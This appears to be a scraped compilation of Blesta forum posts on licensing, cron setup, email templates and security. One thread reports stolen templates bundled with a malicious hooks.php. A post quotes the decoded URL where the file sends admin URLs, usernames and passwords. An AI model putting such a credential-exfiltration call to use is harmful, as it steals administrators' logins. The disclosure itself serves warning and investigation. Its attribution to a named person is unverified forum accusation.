Leaderboard

A new email template will be in v3.4 that will be used to send these non-merchant gateway payment receipts.

Hopefully Paul and Team won't mind me listing this here (also listed at WHT) since Paul already knows about my plans . ---------- With this purchase ($300 value if purchased direct from Blesta) you will receive a v3 owned unbranded license as well as a v2 owned unbranded license. The support for these licenses is expired, yearly renewal is $39. We are hoping to raise $200 through the sale of this license, lower offers are welcomed but please remember all proceeds from this sale will be directly donated to the formation of a non-profit and not for personal gain. Disclaimer: This license is being sold to provide direct monetary support to a non-profit that I am involved in forming. I have spoken with Paul about this and have his full support in this sale, I'm sure I can get him to come along and post as to the validity of this sale. Because said non-profit is still in it's formation stage we are not ready to provide info publically, but if anyone is interested further in that aspect of this sale please feel free to PM me.

A month ago I started developing VirtKick, a simple cloud management panel. Today the first hosted alpha is out! https://alpha.virtkick.io/ Check it out and let me know how you like it. If you'd like to participate in closed beta tests, be sure to sign up at www.virtkick.io.

This made me laugh so much I was in tears haha... Come on I had to share it haha

If you have your cron setup to run on your server, and you have the Provision Paid Pending Services cron task enabled (it is by default), then paid services will be provisioned by the cron as often as the cron task interval allows (default is 5 minutes). e.g. Customer orders domain from the order form Customer pays the invoice created for that service <within 5 minutes> Cron provisions the domain with the registrar Service is active

As you know, there is already an "order received (mobile)" email template available and this is the email that I receive. I propose that the unique link is available universally, to both the "order received" and "order received (mobile)" email template because it would be so much easier to approve an order with one click whatever device you are on (but particularly mobiles!).

The site https://dorob.de/whmcs/%C2'> also reselling stolen templates along with extra hooks.php file. I can share the hooks file if it helps the investigation.

yes that's correct, because that's the default one, if nothing is in the package groups then it skips it, but that's the only one designed for it. The others are for other packages. Having a non Standard for a domain form does nothing, it's the same one.

I have had that problem before. I think there can be a few causes, but my problem was something to do with the currencies set up in the package. The reason why Firefox doesn't work while Chrome does is probably that you're logged in on one browser and you're using a different currency.

Good luck sounds like a good cause mate.

Are you able to try running it from /admin/settings/system/automation/ or from the terminal? If URL rewriting isn't working then try using yourdomain.com/index.php/cron: http://docs.blesta.com/display/user/Installing+Blesta#InstallingBlesta-4.SetupaCronJob

HSTS has to be configured domain wide, so should only be done via server config, not application specific. I'm not sure many people install only Blesta on their domain.

Yeah, but as we know, hosts don't care, some still run Blesta on PHP 5.2, so it's best to be proactive with these things and help them protect their customers' data. It could be made optional from the settings tab. There could be a new security section where you can enable all these things. Never do it via .htaccess in 2014! ini_set is the way to go.

We sent a notice to the ISP

Yeah, PauloV decoded it. I debated not posting this information but here's where the file sends your admin details: https://my.dorob.de/modules/addons/passwords/insert.php?url=" . $url . "&user=" . $u . "&pw=" . $p Domain is registered to: IP address is 37.228.135.135 which belongs to: This person also has the twitter account https://twitter.com/dorobde and was critical of Blesta in this tweet: https://twitter.com/DoRobDE/status/507934296829861888

File decoded I have sent u a PM on this forum I have detected the injection and the url that you will be able to find easily

Every tool we tested didnt decrypt the file I think is encoded with the latest ioncube encoderes and and we only support IC <=7 and PHP <=5.3 to decode, we will trie to to get the lastest decoders and post it back

I hate the paypal buttons, however, the Blesta button should at least have "Pay Now" or "Pay Here". or something to that effect included. Leave no doubt in the user's mind.

Ok guys -- I think this has received enough +1's, thanks! Please see CORE-1428